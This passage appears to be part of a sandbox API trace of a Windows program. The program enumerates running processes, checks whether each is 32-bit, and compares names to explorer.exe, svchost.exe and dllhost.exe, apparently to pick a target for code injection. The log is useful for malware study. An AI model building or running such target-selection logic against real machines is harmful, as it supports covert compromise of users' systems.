dwProcessId=0x7fc) returned 0xd8 [0215.181] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.181] CloseHandle (hObject=0xd8) returned 1 [0215.181] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0215.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0215.182] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.182] CloseHandle (hObject=0xd8) returned 1 [0215.182] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0215.183] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0215.183] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0215.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0215.184] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0215.184] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0215.185] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0215.185] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.185] CloseHandle (hObject=0xd8) returned 1 [0215.185] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0215.185] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0215.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0215.186] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.186] CloseHandle (hObject=0xd8) returned 1 [0215.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0215.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0215.186] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0215.186] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0215.186] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0215.254] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.254] CloseHandle (hObject=0xd8) returned 1 [0215.254] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0215.255] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.255] CloseHandle (hObject=0xd8) returned 1 [0215.255] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0215.255] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0215.256] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.256] CloseHandle (hObject=0xd8) returned 1 [0215.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0215.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0215.257] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.257] CloseHandle (hObject=0xd8) returned 1 [0215.257] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0215.257] CloseHandle (hObject=0xd4) returned 1 [0215.257] Sleep (dwMilliseconds=0x3e8) [0216.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0216.423] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0216.424] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0216.424] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0216.425] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0216.425] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0216.426] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0216.426] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0216.427] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0216.427] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0216.428] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0216.428] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0216.429] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0216.429] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0216.430] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0216.430] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0216.431] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0216.431] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0216.432] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0216.432] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0216.433] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.433] CloseHandle (hObject=0xd8) returned 1 [0216.433] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0216.433] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0216.433] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0216.433] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0216.434] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0216.434] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.434] CloseHandle (hObject=0xd8) returned 1 [0216.434] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0216.434] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0216.434] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0216.434] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0216.435] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0216.435] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0216.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0216.436] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.436] CloseHandle (hObject=0xd8) returned 1 [0216.436] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0216.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0216.436] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.436] CloseHandle (hObject=0xd8) returned 1 [0216.437] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0216.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0216.437] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.437] CloseHandle (hObject=0xd8) returned 1 [0216.437] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0216.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0216.438] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.438] CloseHandle (hObject=0xd8) returned 1 [0216.438] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0216.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0216.438] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.438] CloseHandle (hObject=0xd8) returned 1 [0216.438] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0216.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0216.439] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.439] CloseHandle (hObject=0xd8) returned 1 [0216.439] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0216.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0216.439] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.439] CloseHandle (hObject=0xd8) returned 1 [0216.439] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0216.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0216.440] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.440] CloseHandle (hObject=0xd8) returned 1 [0216.440] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0216.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0216.441] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.441] CloseHandle (hObject=0xd8) returned 1 [0216.441] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0216.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0216.441] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.441] CloseHandle (hObject=0xd8) returned 1 [0216.441] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0216.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0216.442] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.442] CloseHandle (hObject=0xd8) returned 1 [0216.442] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0216.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0216.442] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.442] CloseHandle (hObject=0xd8) returned 1 [0216.442] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0216.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0216.446] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.446] CloseHandle (hObject=0xd8) returned 1 [0216.446] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0216.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0216.447] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.447] CloseHandle (hObject=0xd8) returned 1 [0216.447] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0216.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 